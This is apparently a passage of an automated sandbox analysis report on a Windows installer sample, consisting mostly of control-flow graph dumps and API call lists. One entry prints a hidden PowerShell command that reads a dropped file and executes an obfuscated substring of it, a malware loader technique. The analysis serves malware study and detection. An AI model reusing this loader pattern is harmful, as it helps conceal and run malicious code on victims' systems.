3804->3803 3809 4050fb 3805->3809 3810 4050ee ShowWindow 3805->3810 3806->3791 3807 405133 SendMessageA SendMessageA 3806->3807 3807->3791 3811 4052ab SendMessageA 3808->3811 3817 403e9d SendMessageA 3809->3817 3810->3809 3811->3811 3812 4052c8 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3811->3812 3814 4052ea SendMessageA 3812->3814 3814->3814 3815 40530c GlobalUnlock SetClipboardData CloseClipboard 3814->3815 3815->3791 3816->3776 3817->3806 3818->3777 4339 401d26 GetDC GetDeviceCaps 4340 4029e2 18 API calls 4339->4340 4341 401d44 MulDiv ReleaseDC 4340->4341 4342 4029e2 18 API calls 4341->4342 4343 401d63 4342->4343 4344 405b9c 18 API calls 4343->4344 4345 401d9c CreateFontIndirectA 4344->4345 4346 4024cd 4345->4346 4347 100018e6 GetCommandLineA lstrcpynA 4348 1000193a 4347->4348 4349 1000195a CharNextA 4348->4349 4350 10001951 CharNextA 4348->4350 4351 1000195f CreateProcessA 4349->4351 4350->4348 4353 10001989 WaitForSingleObject GetExitCodeProcess CloseHandle CloseHandle ExitProcess 4351->4353 4354 100019ba ExitProcess 4351->4354 4355 4042a6 4356 4042d2 4355->4356 4357 4042e3 4355->4357 4416 405372 GetDlgItemTextA 4356->4416 4359 4042ef GetDlgItem 4357->4359 4366 40434e 4357->4366 4362 404303 4359->4362 4360 404432 4365 4045cd 4360->4365 4418 405372 GetDlgItemTextA 4360->4418 4361 4042dd 4363 405de5 5 API calls 4361->4363 4364 404317 SetWindowTextA 4362->4364 4369 4056a3 4 API calls 4362->4369 4363->4357 4370 403e68 19 API calls 4364->4370 4368 403ecf 8 API calls 4365->4368 4366->4360 4366->4365 4371 405b9c 18 API calls 4366->4371 4373 4045e1 4368->4373 4374 40430d 4369->4374 4375 404333 4370->4375 4376 4043c2 SHBrowseForFolderA 4371->4376 4372 404462 4377 4056f8 18 API calls 4372->4377 4374->4364 4381 40560a 3 API calls 4374->4381 4378 403e68 19 API calls 4375->4378 4376->4360 4379 4043da CoTaskMemFree 4376->4379 4380 404468 4377->4380 4382 404341 4378->4382 4383 40560a 3 API calls 4379->4383 4419 405b7a lstrcpynA 4380->4419 4381->4364 4417 403e9d SendMessageA 4382->4417 4385 4043e7 4383->4385 4388 40441e SetDlgItemTextA 4385->4388 4392 405b9c 18 API calls 4385->4392 4387 404347 4390 405ea5 3 API calls 4387->4390 4388->4360 4389 40447f 4391 405ea5 3 API calls 4389->4391 4390->4366 4398 404487 4391->4398 4393 404406 lstrcmpiA 4392->4393 4393->4388 4395 404417 lstrcatA 4393->4395 4394 4044c1 4420 405b7a lstrcpynA 4394->4420 4395->4388 4397 4044c8 4399 4056a3 4 API calls 4397->4399 4398->4394 4403 405651 2 API calls 4398->4403 4404 404512 4398->4404 4400 4044ce GetDiskFreeSpaceA 4399->4400 4402 4044f0 MulDiv 4400->4402 4400->4404 4402->4404 4403->4398 4405 40457c 4404->4405 4407 40464e 21 API calls 4404->4407 4406 40459f 4405->4406 4408 40140b 2 API calls 4405->4408 4421 403e8a KiUserCallbackDispatcher 4406->4421 4409 40456e 4407->4409 4408->4406 4411 404573 4409->4411 4412 40457e SetDlgItemTextA 4409->4412 4414 40464e 21 API calls 4411->4414 4412->4405 4413 4045bb 4413->4365 4422 40423b 4413->4422 4414->4405 4416->4361 4417->4387 4418->4372 4419->4389 4420->4397 4421->4413 4423 404249 4422->4423 4424 40424e SendMessageA 4422->4424 4423->4424 4424->4365 3838 40172c 3839 4029ff 18 API calls 3838->3839 3840 401733 3839->3840 3841 40583a 2 API calls 3840->3841 3842 40173a 3841->3842 3843 40583a 2 API calls 3842->3843 3843->3842 3844 401dac 3845 4029e2 18 API calls 3844->3845 3846 401db2 3845->3846 3847 4029e2 18 API calls 3846->3847 3848 401dbb 3847->3848 3849 401dc2 ShowWindow 3848->3849 3850 401dcd EnableWindow 3848->3850 3851 402894 3849->3851 3850->3851 4425 401eac 4426 4029ff 18 API calls 4425->4426 4427 401eb3 4426->4427 4428 405e7e 2 API calls 4427->4428 4429 401eb9 4428->4429 4431 401ecb 4429->4431 4432 405ad8 wsprintfA 4429->4432 4432->4431 4433 40192d 4434 4029ff 18 API calls 4433->4434 4435 401934 lstrlenA 4434->4435 4436 4024cd 4435->4436 4437 401cb0 4438 4029e2 18 API calls 4437->4438 4439 401cc0 SetWindowLongA 4438->4439 4440 402894 4439->4440 4441 401a31 4442 4029e2 18 API calls 4441->4442 4443 401a37 4442->4443 4444 4029e2 18 API calls 4443->4444 4445 4019e1 4444->4445 4446 4024b1 4447 4029ff 18 API calls 4446->4447 4448 4024b8 4447->4448 4451 40580b GetFileAttributesA CreateFileA 4448->4451 4450 4024c4 4451->4450 4452 403fb1 4453 403fc7 4452->4453 4458 4040d3 4452->4458 4456 403e68 19 API calls 4453->4456 4454 404142 4455 404216 4454->4455 4457 40414c GetDlgItem 4454->4457 4463 403ecf 8 API calls 4455->4463 4459 40401d 4456->4459 4460 404162 4457->4460 4461 4041d4 4457->4461 4458->4454 4458->4455 4462 404117 GetDlgItem SendMessageA 4458->4462 4464 403e68 19 API calls 4459->4464 4460->4461 4469 404188 6 API calls 4460->4469 4461->4455 4465 4041e6 4461->4465 4483 403e8a KiUserCallbackDispatcher 4462->4483 4467 404211 4463->4467 4468 40402a CheckDlgButton 4464->4468 4470 4041ec SendMessageA 4465->4470 4471 4041fd 4465->4471 4481 403e8a KiUserCallbackDispatcher 4468->4481 4469->4461 4470->4471 4471->4467 4474 404203 SendMessageA 4471->4474 4472 40413d 4475 40423b SendMessageA 4472->4475 4474->4467 4475->4454 4476 404048 GetDlgItem 4482 403e9d SendMessageA 4476->4482 4478 40405e SendMessageA 4479 404085 SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 4478->4479 4480 40407c GetSysColor 4478->4480 4479->4467 4480->4479 4481->4476 4482->4478 4483->4472 3858 401e32 3859 4029ff 18 API calls 3858->3859 3860 401e38 3859->3860 3861 404e65 25 API calls 3860->3861 3862 401e42 3861->3862 3863 40532d 2 API calls 3862->3863 3864 401e48 3863->3864 3865 401e9e CloseHandle 3864->3865 3866 401e67 WaitForSingleObject 3864->3866 3867 402665 3864->3867 3869 405ede 2 API calls 3864->3869 3865->3867 3866->3864 3868 401e75 GetExitCodeProcess 3866->3868 3870 401e92 3868->3870 3871 401e87 3868->3871 3869->3866 3870->3865 3873 401e90 3870->3873 3874 405ad8 wsprintfA 3871->3874 3873->3865 3874->3873 3875 4015b3 3876 4029ff 18 API calls 3875->3876 3877 4015ba 3876->3877 3878 4056a3 4 API calls 3877->3878 3879 4015c2 3878->3879 3880 40160a 3879->3880 3881 405635 CharNextA 3879->3881 3882 401638 3880->3882 3883 40160f 3880->3883 3884 4015d0 CreateDirectoryA 3881->3884 3888 401423 25 API calls 3882->3888 3885 401423 25 API calls 3883->3885 3884->3879 3886 4015e5 GetLastError 3884->3886 3887 401616 3885->3887 3886->3879 3889 4015f2 GetFileAttributesA 3886->3889 3893 405b7a lstrcpynA 3887->3893 3892 401630 3888->3892 3889->3879 3891 401621 SetCurrentDirectoryA 3891->3892 3893->3891 3894 402036 3895 4029ff 18 API calls 3894->3895 3896 40203d 3895->3896 3897 4029ff 18 API calls 3896->3897 3898 402047 3897->3898 3899 4029ff 18 API calls 3898->3899 3900 402051 3899->3900 3901 4029ff 18 API calls 3900->3901 3902 40205b 3901->3902 3903 4029ff 18 API calls 3902->3903 3904 402065 3903->3904 3905 40207b CoCreateInstance 3904->3905 3906 4029ff 18 API calls 3904->3906 3907 40214f 3905->3907 3910 40209a 3905->3910 3906->3905 3908 401423 25 API calls 3907->3908 3909 402183 3907->3909 3908->3909 3910->3907 3911 402131 MultiByteToWideChar 3910->3911 3911->3907 4484 4014b7 4485 4014bd 4484->4485 4486 401389 2 API calls 4485->4486 4487 4014c5 4486->4487 3912 401bb8 3913 4029e2 18 API calls 3912->3913 3914 401bbf 3913->3914 3915 4029e2 18 API calls 3914->3915 3916 401bc9 3915->3916 3917 401bd9 3916->3917 3918 4029ff 18 API calls 3916->3918 3919 401be9 3917->3919 3920 4029ff 18 API calls 3917->3920 3918->3917 3921 401bf4 3919->3921 3922 401c38 3919->3922 3920->3919 3923 4029e2 18 API calls 3921->3923 3924 4029ff 18 API calls 3922->3924 3926 401bf9 3923->3926 3925 401c3d 3924->3925 3927 4029ff 18 API calls 3925->3927 3928 4029e2 18 API calls 3926->3928 3929 401c46 FindWindowExA 3927->3929 3930 401c02 3928->3930 3933 401c64 3929->3933 3931 401c28 SendMessageA 3930->3931 3932 401c0a SendMessageTimeoutA 3930->3932 3931->3933 3932->3933 3934 40243c 3935 402b09 19 API calls 3934->3935 3936 402446 3935->3936 3937 4029e2 18 API calls 3936->3937 3938 40244f 3937->3938 3939 402665 3938->3939 3940 402472 RegEnumValueA 3938->3940 3941 402466 RegEnumKeyA 3938->3941 3940->3939 3942 40248b RegCloseKey 3940->3942 3941->3942 3942->3939 3944 40223d 3945 40224b 3944->3945 3946 402245 3944->3946 3948 40225b 3945->3948 3949 4029ff 18 API calls 3945->3949 3947 4029ff 18 API calls 3946->3947 3947->3945 3950 402269 3948->3950 3952 4029ff 18 API calls 3948->3952 3949->3948 3951 4029ff 18 API calls 3950->3951 3953 402272 WritePrivateProfileStringA 3951->3953 3952->3950 3954 40173f 3955 4029ff 18 API calls 3954->3955 3956 401746 3955->3956 3957 401764 3956->3957 3958 40176c 3956->3958 3994 405b7a lstrcpynA 3957->3994 3995 405b7a lstrcpynA 3958->3995 3961 40176a 3965 405de5 5 API calls 3961->3965 3962 401777 3963 40560a 3 API calls 3962->3963 3964 40177d lstrcatA 3963->3964 3964->3961 3971 401789 3965->3971 3966 405e7e 2 API calls 3966->3971 3967 4057e6 2 API calls 3967->3971 3969 4017a0 CompareFileTime 3969->3971 3970 401864 3972 404e65 25 API calls 3970->3972 3971->3966 3971->3967 3971->3969 3971->3970 3974 405b7a lstrcpynA 3971->3974 3981 405b9c 18 API calls 3971->3981 3990 40538e MessageBoxIndirectA 3971->3990 3991 40183b 3971->3991 3993 40580b GetFileAttributesA CreateFileA 3971->3993 3975 40186e 3972->3975 3973 404e65 25 API calls 3980 401850 3973->3980 3974->3971 3976 402e64 33 API calls 3975->3976 3978 401881 3976->3978 3977 401895 SetFileTime 3979 4018a7 CloseHandle 3977->3979 3978->3977 3978->3979 3982 402228 3979->3982 3983 4018b8 3979->3983 3981->3971 3982->3980 3984 4018d0 3983->3984 3985 4018bd 3983->3985 3987 405b9c 18 API calls 3984->3987 3986 405b9c 18 API calls 3985->3986 3988 4018c5 lstrcatA 3986->3988 3989 4018d8 3987->3989 3988->3989 3992 40538e MessageBoxIndirectA 3989->3992 3990->3971 3991->3973 3991->3980 3992->3982 3993->3971 3994->3961 3995->3962 4488 40163f 4489 4029ff 18 API calls 4488->4489 4490 401645 4489->4490 4491 405e7e 2 API calls 4490->4491 4492 40164b 4491->4492 4493 40193f 4494 4029e2 18 API calls 4493->4494 4495 401946 4494->4495 4496 4029e2 18 API calls 4495->4496 4497 401950 4496->4497 4498 4029ff 18 API calls 4497->4498 4499 401959 4498->4499 4500 40196c lstrlenA 4499->4500 4501 4019a7 4499->4501 4502 401976 4500->4502 4502->4501 4506 405b7a lstrcpynA 4502->4506 4504 401990 4504->4501 4505 40199d lstrlenA 4504->4505 4505->4501 4506->4504

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 0 100010d3-10001101 call 10001096 3 10001107-10001147 GetModuleFileNameA GlobalAlloc 0->3 4 1000123e-10001255 GlobalAlloc 0->4 6 1000114a-1000114d 3->6 5 10001257-1000126d 4->5 7 1000128e-100012a3 call 100019c5 call 100017fc 5->7 8 1000126f-10001289 FindWindowExA * 2 5->8 9 10001169-10001171 6->9 10 1000114f-10001167 CharPrevA 6->10 24 100012b4-100012c2 lstrcmpiA 7->24 25 100012a5-100012b2 call 10001850 7->25 8->7 12 10001173-10001184 call 10001a05 GlobalFree 9->12 13 10001189-100011b5 GetTempFileNameA CopyFileA 9->13 10->6 10->9 23 10001771-10001775 12->23 16 100011b7-100011e8 CreateFileA CreateFileMappingA MapViewOfFile 13->16 17 1000121c-1000123c lstrcatA lstrlenA 13->17 20 10001210-1000121a CloseHandle * 2 16->20 21 100011ea-1000120a UnmapViewOfFile 16->21 17->5 20->17 21->20 27 100012c4 24->27 28 100012cf-100012d1 24->28 32 100012cb-100012cd 25->32 27->32 29 100012d3-100012e3 call 10001a05 28->29 30 100012fe-10001378 28->30 42 100012e5 29->42 43 100012e8-100012eb 29->43 34 100013a8-100013bc GetVersionExA 30->34 35 1000137a-10001383 30->35 32->7 39 100013e0 34->39 40 100013be-100013de InitializeSecurityDescriptor SetSecurityDescriptorDacl 34->40 37 10001385 35->37 38 1000138a-10001398 GlobalAlloc 35->38 37->38 44 10001461-10001473 lstrcpyA 38->44 45 1000139e-100013a5 GlobalLock 38->45 41 100013e3-10001401 CreatePipe 39->41 40->41 41->44 46 10001403-10001414 CreatePipe 41->46 42->43 48 100012f6 43->48 49 100012ed-100012f0 DeleteFileA 43->49 47 100016a9-100016ad 44->47 45->34 46->44 52 10001416-1000145f GetStartupInfoA CreateProcessA 46->52 50 100016b7-100016bb 47->50 51 100016af-100016b2 call 10001a05 47->51 48->30 49->48 55 100016bd-100016c2 50->55 56 100016cf-100016d6 50->56 51->50 52->44 54 10001478-1000147e GetTickCount 52->54 57 10001481-10001489 54->57 55->56 58 100016c4-100016ce call 10001776 55->58 59 100016d8-100016e4 lstrcpyA 56->59 60 100016ea-100016f0 56->60 61 10001494-100014a8 PeekNamedPipe 57->61 62 1000148b-1000148e 57->62 58->56 59->60 64 100016f2-10001707 wsprintfA 60->64 65 1000170a-10001740 call 10001a05 CloseHandle * 6 60->65 67 10001624-10001629 61->67 68 100014ae-100014d7 GetTickCount ReadFile 61->68 62->47 62->61 64->65 78 10001742 65->78 79 10001745-10001748 65->79 72 10001659-1000165b Sleep 67->72 73 1000162b-10001638 GetTickCount 67->73 70 10001661-1000168f WaitForSingleObject GetExitCodeProcess PeekNamedPipe 68->70 71 100014dd-100014ec lstrlenA 68->71 70->57 75 1000150c-10001524 lstrlenA GlobalSize 71->75 76 100014ee-10001507 lstrlenA lstrcpynA 71->76 72->70 73->72 77 1000163a-10001657 TerminateProcess lstrcpyA 73->77 82 10001556-10001568 lstrcatA 75->82 83 10001526-10001546 GlobalUnlock GlobalReAlloc 75->83 76->70 77->70 78->79 80 10001753-10001761 GlobalFree 79->80 81 1000174a-1000174d DeleteFileA 79->81 80->23 84 10001763-1000176f GlobalUnlock GlobalFree 80->84 81->80 87 100015b9-100015c4 call 100017fc 82->87 85 10001694-100016a6 lstrcpyA 83->85 86 1000154c-10001553 GlobalLock 83->86 84->23 85->47 86->82 90 100015c6-100015cd 87->90 91 1000156a-1000157d GlobalSize 87->91 90->70 94 100015d3-100015d7 90->94 92 10001585-10001596 lstrlenA 91->92 93 1000157f-10001583 91->93 96 100015a1-100015b0 lstrcpyA 92->96 97 10001598-1000159f 92->97 95 100015b3-100015b8 93->95 98 100015d9-100015dc 94->98 99 100015de-100015e0 94->99 95->87 96->95 97->96 97->97 100 10001608-1000160a 98->100 101 100015e2-100015e4 99->101 102 100015ff-10001606 CharNextA 99->102 100->94 103 1000160c-1000160f 100->103 104 100015eb-100015ed 101->104 102->100 103->70 107 10001611-10001614 103->107 105 100015e6-100015e8 104->105 106 100015ef-100015fd call 10001776 104->106 105->106 110 100015ea 105->110 106->100 109 1000161a-1000161e 107->109 112 10001620-10001622 109->112 113 10001616-10001619 109->113 110->104 112->70 113->109
                                                                          APIs
                                                                            • Part of subcall function 10001096: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,0000001F,?,100010FF), ref: 100010A5
                                                                            • Part of subcall function 10001096: GetProcAddress.KERNEL32(00000000), ref: 100010AC
                                                                            • Part of subcall function 10001096: GetCurrentProcess.KERNEL32(?,?,0000001F,?,100010FF), ref: 100010BC
                                                                          • GetModuleFileNameA.KERNEL32(?,00000104), ref: 10001119
                                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 1000112F
                                                                          • CharPrevA.USER32(?,?), ref: 10001157
                                                                          • GlobalFree.KERNEL32(00000000), ref: 1000117E
                                                                          • GetTempFileNameA.KERNEL32(?,10003068,00000000,00000001), ref: 1000119B
                                                                          • CopyFileA.KERNEL32(?,00000001,00000000), ref: 100011AD
                                                                          • CreateFileA.KERNEL32(00000001,C0000000,00000000,00000000,00000003,00000000,00000000), ref: 100011C3
                                                                          • CreateFileMappingA.KERNEL32(00000000,00000000,00000004,00000000,00000000,00000000), ref: 100011D2
                                                                          • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000), ref: 100011E0
                                                                          • UnmapViewOfFile.KERNEL32(00000000), ref: 1000120A
                                                                          • CloseHandle.KERNEL32(00000000), ref: 10001217
                                                                          • CloseHandle.KERNEL32(00000000), ref: 1000121A
                                                                          • lstrcatA.KERNEL32(?,10003064), ref: 10001224
                                                                          • lstrlenA.KERNEL32(?), ref: 1000122D
                                                                          • GlobalAlloc.KERNEL32(00000040,00000401), ref: 1000124C
                                                                          • FindWindowExA.USER32(00010458,00000000,#32770,00000000), ref: 10001284
                                                                          • FindWindowExA.USER32(00000000), ref: 10001287
                                                                          • lstrcmpiA.KERNEL32(00000000,/OEM), ref: 100012BA
                                                                          • DeleteFileA.KERNEL32(?,error), ref: 100012F0
                                                                          • GlobalAlloc.KERNEL32(00000042,00000400), ref: 1000138D
                                                                          • GlobalLock.KERNEL32(00000000), ref: 1000139F
                                                                          • GetVersionExA.KERNEL32(00000094), ref: 100013AF
                                                                          • InitializeSecurityDescriptor.ADVAPI32(?,00000001), ref: 100013C4
                                                                          • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,00000000,00000000), ref: 100013D2
                                                                          • CreatePipe.KERNELBASE(?,?,0000000C,00000000), ref: 100013FD
                                                                          • CreatePipe.KERNELBASE(?,?,0000000C,00000000), ref: 10001410
                                                                          • GetStartupInfoA.KERNEL32(00000044), ref: 1000141D
                                                                          • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,?), ref: 10001457
                                                                          • lstrcpyA.KERNEL32(?,error), ref: 1000146D
                                                                          • GetTickCount.KERNEL32 ref: 10001478
                                                                          • PeekNamedPipe.KERNELBASE(?,00000000,00000000,00000000,00000001,00000000), ref: 1000149F
                                                                          • GetTickCount.KERNEL32 ref: 100014AE
                                                                          • ReadFile.KERNEL32(?,10003078,000003FF,00000001,00000000), ref: 100014C5
                                                                          • lstrlenA.KERNEL32(?), ref: 100014E6
                                                                          • lstrlenA.KERNEL32(?,10003078,00000400), ref: 100014FB
                                                                          • lstrcpynA.KERNEL32(?), ref: 10001501
                                                                          • lstrlenA.KERNEL32(10003078), ref: 10001510
                                                                          • GlobalSize.KERNEL32(?), ref: 1000151C
                                                                          • GlobalUnlock.KERNEL32(?), ref: 10001529
                                                                          • GlobalReAlloc.KERNEL32(?,-000002FD,00000042), ref: 1000153B
                                                                          • GlobalLock.KERNEL32(00000000), ref: 1000154D
                                                                          • lstrcatA.KERNEL32(?,10003078), ref: 1000155A
                                                                          • GlobalSize.KERNEL32(?), ref: 1000156D
                                                                          • CharNextA.USER32(?), ref: 10001600
                                                                          • GetTickCount.KERNEL32 ref: 1000162B
                                                                          • TerminateProcess.KERNEL32(?,000000FF), ref: 1000163F
                                                                          • lstrcpyA.KERNEL32(?,timeout), ref: 10001651
                                                                          • Sleep.KERNELBASE(00000064), ref: 1000165B
                                                                          • WaitForSingleObject.KERNEL32(?,00000000), ref: 10001665
                                                                          • GetExitCodeProcess.KERNELBASE(?,?), ref: 10001675
                                                                          • PeekNamedPipe.KERNELBASE(?,00000000,00000000,00000000,00000001,00000000), ref: 10001686
                                                                            • Part of subcall function 100017FC: lstrlenA.KERNEL32(?,?,00000000,00000000,?,?,1000129F,00000000,/TIMEOUT=,00000000), ref: 1000180C
                                                                            • Part of subcall function 100017FC: lstrlenA.KERNEL32(?,?,?,1000129F,00000000,/TIMEOUT=,00000000), ref: 1000183E
                                                                          • lstrcpyA.KERNEL32(?,error), ref: 100016A0
                                                                          • lstrcpyA.KERNEL32(?,error), ref: 100016E4
                                                                          • wsprintfA.USER32 ref: 10001701
                                                                          • CloseHandle.KERNEL32(?,?), ref: 1000171F
                                                                          • CloseHandle.KERNEL32(?), ref: 10001724
                                                                          • CloseHandle.KERNEL32(?), ref: 10001729
                                                                          • CloseHandle.KERNEL32(?), ref: 1000172E
                                                                          • CloseHandle.KERNEL32(?), ref: 10001733
                                                                          • CloseHandle.KERNEL32(?), ref: 10001738
                                                                          • DeleteFileA.KERNEL32(?), ref: 1000174D
                                                                          • GlobalFree.KERNEL32(00000001), ref: 1000175C
                                                                          • GlobalUnlock.KERNEL32(?), ref: 10001766
                                                                          • GlobalFree.KERNEL32(?), ref: 1000176F
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1660349596.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                                                          • Associated: 00000000.00000002.1660317252.0000000010000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1660367794.0000000010002000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1660387960.0000000010003000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1660407195.0000000010004000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_10000000_hnTW5HdWvY.jbxd
                                                                          Similarity
                                                                          • API ID: Global$File$Handle$Close$lstrlen$Create$AllocPipeProcesslstrcpy$CountFreeTick$CharDeleteDescriptorFindLockModuleNameNamedPeekSecuritySizeUnlockViewWindowlstrcat$AddressCodeCopyCurrentDaclExitInfoInitializeMappingNextObjectPrevProcReadSingleSleepStartupTempTerminateUnmapVersionWaitlstrcmpilstrcpynwsprintf
                                                                          • String ID: $#32770$/OEM$/TIMEOUT=$D$SysListView32$error$timeout
                                                                          • API String ID: 3603830316-610251817
                                                                          • Opcode ID: 016e07df3c6318c65741b72991dda62d90931a2e4b8fd357ffb1f2aeac278298
                                                                          • Instruction ID: 5d3aa95b024551451db062b49e7ededdcde9422ea28527eb2b4ccaa03aed4984
                                                                          • Opcode Fuzzy Hash: 016e07df3c6318c65741b72991dda62d90931a2e4b8fd357ffb1f2aeac278298
                                                                          • Instruction Fuzzy Hash: 76224A71800259EFFB12DFA4CC88AEEBBB9EF08384F154069E645A7169DB315E45CB60
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 114 4030cb-403162 #17 SetErrorMode OleInitialize call 405ea5 SHGetFileInfoA call 405b7a GetCommandLineA call 405b7a GetModuleHandleA 121 403164-403169 114->121 122 40316e-403183 call 405635 CharNextA 114->122 121->122 125 403248-40324c 122->125 126 403252 125->126 127 403188-40318b 125->127 130 403265-40327f GetTempPathA call 403097 126->130 128 403193-40319b 127->128 129 40318d-403191 127->129 131 4031a3-4031a6 128->131 132 40319d-40319e 128->132 129->128 129->129 137 403281-40329f GetWindowsDirectoryA lstrcatA call 403097 130->137 138 4032d7-4032f1 DeleteFileA call 402c2b 130->138 134 403238-403245 call 405635 131->134 135 4031ac-4031b0 131->135 132->131 134->125 154 403247 134->154 140 4031b2-4031b8 135->140 141 4031c8-4031f5 135->141 137->138 155 4032a1-4032d1 GetTempPathA lstrcatA SetEnvironmentVariableA * 2 call 403097 137->155 156 403385-403394 call 403529 OleUninitialize 138->156 157 4032f7-4032fd 138->157 147 4031ba-4031bc 140->147 148 4031be 140->148 143 4031f7-4031fd 141->143 144 403208-403236 141->144 150 403203 143->150 151 4031ff-403201 143->151 144->134 152 403254-403260 call 405b7a 144->152 147->141 147->148 148->141 150->144 151->144 151->150 152->130 154->125 155->138 155->156 169 40339a-4033aa call 40538e ExitProcess 156->169 170 40348e-403494 156->170 160 403375-40337c call 403603 157->160 161 4032ff-40330a call 405635 157->161 167 403381 160->167 174 403340-40334a 161->174 175 40330c-403335 161->175 167->156 172 403511-403519 170->172 173 403496-4034b3 call 405ea5 * 3 170->173 180 40351b 172->180 181 40351f-403523 ExitProcess 172->181 201 4034b5-4034b7 173->201 202 4034fd-403508 ExitWindowsEx 173->202 177 4033b0-4033ca lstrcatA lstrcmpiA 174->177 178 40334c-403359 call 4056f8 174->178 182 403337-403339 175->182 177->156 184 4033cc-4033e1 CreateDirectoryA SetCurrentDirectoryA 177->184 178->156 191 40335b-403371 call 405b7a * 2 178->191 180->181 182->174 186 40333b-40333e 182->186 188 4033e3-4033e9 call 405b7a 184->188 189 4033ee-403416 call 405b7a 184->189 186->174 186->182 188->189 200 40341c-403438 call 405b9c DeleteFileA 189->200 191->160 211 403479-403480 200->211 212 40343a-40344a CopyFileA 200->212 201->202 205 4034b9-4034bb 201->205 202->172 207 40350a-40350c call 40140b 202->207 205->202 209 4034bd-4034cf GetCurrentProcess 205->209 207->172 209->202 218 4034d1-4034f3 209->218 211->200 213 403482-403489 call 405a2e 211->213 212->211 214 40344c-40346c call 405a2e call 405b9c call 40532d 212->214 213->156 214->211 226 40346e-403475 CloseHandle 214->226 218->202 226->211
                                                                          APIs
                                                                          • #17.COMCTL32 ref: 004030EC
                                                                          • SetErrorMode.KERNELBASE(00008001), ref: 004030F7
                                                                          • OleInitialize.OLE32(00000000), ref: 004030FE
                                                                            • Part of subcall function 00405EA5: GetModuleHandleA.KERNEL32(?,?,?,00403110,00000008), ref: 00405EB7
                                                                            • Part of subcall function 00405EA5: LoadLibraryA.KERNELBASE(?,?,?,00403110,00000008), ref: 00405EC2
                                                                            • Part of subcall function 00405EA5: GetProcAddress.KERNEL32(00000000,?), ref: 00405ED3
                                                                          • SHGetFileInfoA.SHELL32(0079D4B8,00000000,?,00000160,00000000,00000008), ref: 00403126
                                                                            • Part of subcall function 00405B7A: lstrcpynA.KERNEL32(?,?,00000400,0040313B,Profiling Setup,NSIS Error), ref: 00405B87
                                                                          • GetCommandLineA.KERNEL32(Profiling Setup,NSIS Error), ref: 0040313B
                                                                          • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\hnTW5HdWvY.exe",00000000), ref: 0040314E
                                                                          • CharNextA.USER32(00000000,"C:\Users\user\Desktop\hnTW5HdWvY.exe",00000020), ref: 00403179
                                                                          • GetTempPathA.KERNELBASE(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 00403276
                                                                          • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 00403287
                                                                          • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403293
                                                                          • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004032A7
                                                                          • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004032AF
                                                                          • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 004032C0
                                                                          • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 004032C8
                                                                          • DeleteFileA.KERNELBASE(1033), ref: 004032DC
                                                                          • OleUninitialize.OLE32(?), ref: 0040338A
                                                                          • ExitProcess.KERNEL32 ref: 004033AA
                                                                          • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\hnTW5HdWvY.exe",00000000,?), ref: 004033B6
                                                                          • lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop), ref: 004033C2
                                                                          • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 004033CE
                                                                          • SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 004033D5
                                                                          • DeleteFileA.KERNEL32(0079D0B8,0079D0B8,?,"powershell.exe" -windowstyle hidden "$Apologi133=Get-Content 'C:\Users\user\AppData\Roaming\kraftfuldheders\Fide231\recited\Bundforskelligt.For';$Equestrial=$Apologi133.SubString(19094,3);.$Equestrial($Apologi133)",?), ref: 0040342E
                                                                          • CopyFileA.KERNEL32(C:\Users\user\Desktop\hnTW5HdWvY.exe,0079D0B8,00000001), ref: 00403442
                                                                          • CloseHandle.KERNEL32(00000000,0079D0B8,0079D0B8,?,0079D0B8,00000000), ref: 0040346F
                                                                          • GetCurrentProcess.KERNEL32(00000028,?,00000005,00000004,00000003), ref: 004034C4
                                                                          • ExitWindowsEx.USER32(00000002,00000000), ref: 00403500
                                                                          • ExitProcess.KERNEL32 ref: 00403523
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1658713547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1658696695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658730160.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
